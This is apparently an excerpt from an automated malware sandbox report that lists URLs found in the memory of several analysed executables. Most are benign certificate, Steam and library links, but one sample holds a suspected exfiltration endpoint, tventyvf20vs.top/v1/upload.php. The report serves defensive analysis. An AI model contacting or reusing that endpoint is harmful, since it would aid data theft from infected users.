            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: file.exe, 00000000.00000002.1511871135.000001DC9BF4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
            Source: file.exe, 00000000.00000002.1511871135.000001DC9BF4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1971130761.0000000002DC6000.00000008.00000001.01000000.0000000A.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1803265464.0000000002DC6000.00000008.00000001.01000000.0000000A.sdmpString found in binary or memory: http://html4/loose.dtd
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40897C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40897C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40897C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40897C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: file.exe, 00000000.00000002.1511871135.000001DC9BF4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000002.1981264592.0000000003642000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000002.1981264592.0000000003642000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000002.1981264592.0000000003642000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000002.2613150599.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000002.2613150599.000000000139E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20vs.top/
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000002.2613150599.00000000013D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20vs.top/d
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2024792929.0000000001405000.00000004.00000020.00020000.00000000.sdmp, j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000002.2613150599.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000002.2613150599.000000000139E000.00000004.00000020.00020000.00000000.sdmp, j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2088697312.0000000001412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20vs.top/v1/upload.php
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000002.2613150599.00000000013C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20vs.top/v1/upload.php$
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000002.2613150599.000000000139E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20vs.top/v1/upload.phpY
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000002.2613150599.00000000013C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20vs.top/v1/upload.phpx
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40897C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/index.html
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.scipy.org/not/real/data.txt
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: file.exe, 00000000.00000002.1511871135.000001DC9B5B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xyz.edu/data
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40897C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://PROJECT_RTD.readthedocs.io/en/latest/?badge=latest
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2035482768.00000000031E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff~
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.jaraco.com/skeleton
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2690702489.000001E7D25C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
            Source: BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000002.1981220898.00000000035F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1980308119.00000000035F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979898744.00000000035E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2035482768.00000000031E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipinfo.io/static/deviceicons/android-icon-192x192.png
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipinfo.io/static/deviceicons/android-icon-48x48.png
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipinfo.io/static/deviceicons/android-icon-96x96.png
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipinfo.io/static/deviceicons/apple-icon-precomposed.png
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipinfo.io/static/manifest.json
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2035482768.00000000031E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2035482768.00000000031E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codecov.io/gh/hukkin/tomli)
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codecov.io/gh/hukkin/tomli/branch/master/graph/badge.svg)
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Bh1h47R1I7Wg&a
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: BitLockerToGo.exe, 00000013.00000002.1980992420.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1980120039.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000002.1981264592.0000000003642000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=LC2oZRCs
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fIns
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english
